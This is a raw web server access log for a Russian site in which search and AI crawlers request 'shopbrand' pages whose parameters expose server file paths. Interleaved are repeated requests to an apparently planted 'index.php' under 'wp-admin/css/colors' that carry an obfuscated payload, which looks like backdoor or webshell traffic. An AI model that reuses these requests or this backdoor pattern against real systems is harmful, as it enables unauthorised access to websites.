212.16.195.25 - - [30/Oct/2025:05:38:03 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737303133332p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363533332q6131333334613638326665643064306538316466636339663531653237383765222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:38:04 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/edit.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 11808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:38:07 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/wp-admin-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 3297 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:38:07 +1000] "GET /shopbrand/1665777802.shtm HTTP/1.1" 200 25418 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:38:11 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/media.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 9102 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:38:14 +1000] "GET /shopbrand/941095846.shtm HTTP/1.1" 200 24836 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:38:14 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/forms-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 11380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:38:18 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/media-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 9108 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:38:22 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/media-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 10364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:38:26 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/edit.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 13984 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:38:31 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/nav-menus.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 7351 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:38:31 +1000] "GET /shopbrand/1665738159.shtm HTTP/1.1" 200 24236 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:38:35 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/media-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 10364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:38:38 +1000] "GET /shopbrand/941088222.shtm HTTP/1.1" 200 24886 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:05:38:38 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737303136382p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363536382q3730303033396662633266653462313765663135376130623263613336633033222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:38:40 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/site-icon.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 4479 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:38:41 +1000] "GET /shopbrand/941182896.shtm HTTP/1.1" 200 26528 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:38:45 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/about-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 9812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:38:45 +1000] "GET /shopbrand/1665755846.shtm HTTP/1.1" 200 23478 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:38:48 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/forms-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 13554 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:38:51 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/forms.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 11401 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:38:51 +1000] "GET /shopbrand/1665775893.shtm HTTP/1.1" 200 24845 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:38:54 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/edit-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 14007 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:38:59 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/wp-admin-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 3296 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:39:03 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/forms-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 13554 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:39:06 +1000] "GET /shopbrand/1665798361.shtm HTTP/1.1" 200 25964 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:39:07 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/edit-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 14007 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:05:39:11 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737303230312p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363630312q6333353965356362646439303433633330663839636334653864623630333936222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:39:12 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/site-icon-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 4523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.129 - - [30/Oct/2025:05:39:16 +1000] "GET /shopbrand/1665796472.shtm HTTP/1.1" 200 24848 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:39:17 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/media-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 10364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:39:21 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/site-icon-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 4523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:39:22 +1000] "GET /shopbrand/1665766892.shtm HTTP/1.1" 200 24923 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:39:25 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/forms.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 11401 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:39:30 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/about-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 9812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:39:33 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/nav-menus-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 8418 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:39:37 +1000] "GET /shopbrand/941084119.shtm HTTP/1.1" 200 23854 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:05:39:37 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/robots.txt&path=/home/region-gk.ru/data/www/region-gk.ru HTTP/1.1" 200 3190 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:39:39 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/about-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 9812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:39:42 +1000] "GET /shopbrand/941097223.shtm HTTP/1.1" 200 24759 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:39:42 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/about-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 8532 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:39:43 +1000] "GET /shopbrand/1665723038.shtm HTTP/1.1" 200 26143 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:05:39:45 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737303233352p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363633352q6431636137386464393733663831653038623233363962373636323130313666222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:39:45 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/about.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 8521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:39:49 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/edit-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 11811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:39:49 +1000] "GET /shopbrand/941090400.shtm HTTP/1.1" 200 26385 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:39:52 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/about-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 8532 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:39:55 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/nav-menus.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 8408 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:40:00 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/about.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 8521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:40:04 +1000] "GET /shopbrand/1665803253.shtm HTTP/1.1" 200 24024 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:40:04 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/nav-menus.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 8408 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:40:09 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/site-icon.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 4385 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:40:13 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/media.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 9102 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:40:13 +1000] "GET /shopbrand/941099236.shtm HTTP/1.1" 200 25836 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:40:17 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/site-icon.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 4385 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:05:40:17 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737303236372p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363636372q6163653832383162316363313937326135366636633536663162633332333362222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:05:40:18 +1000] "GET /shopbrand/941078031.shtm HTTP/1.1" 200 25501 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:40:20 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/wp-admin-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 3296 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:40:23 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/media-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 9108 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:40:28 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/edit.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 11808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:40:32 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/media-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 9108 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:40:35 +1000] "GET /shopbrand/1665788174.shtm HTTP/1.1" 200 26015 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:40:36 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/wp-admin.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 3296 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:40:42 +1000] "GET /shopbrand/1665754507.shtm HTTP/1.1" 200 25324 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:40:43 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/nav-menus-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 8418 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:40:48 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/wp-admin.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 3270 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:40:50 +1000] "GET /shopbrand/1665740337.shtm HTTP/1.1" 200 24654 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:40:52 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/wp-admin.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 3265 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:05:40:52 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737303330322p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363730322q6564653033333833336136323535363064383363663836323661363766333735222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:40:56 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/edit.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 13984 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
